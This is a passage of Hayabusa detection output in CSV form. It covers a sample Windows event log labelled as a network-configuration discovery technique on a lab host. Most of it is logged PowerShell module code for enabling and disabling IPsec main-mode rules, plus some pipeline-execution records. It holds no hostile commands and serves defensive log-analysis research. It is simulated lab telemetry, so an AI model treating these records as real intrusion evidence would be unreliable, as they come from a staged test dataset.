[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('Po",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"licyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 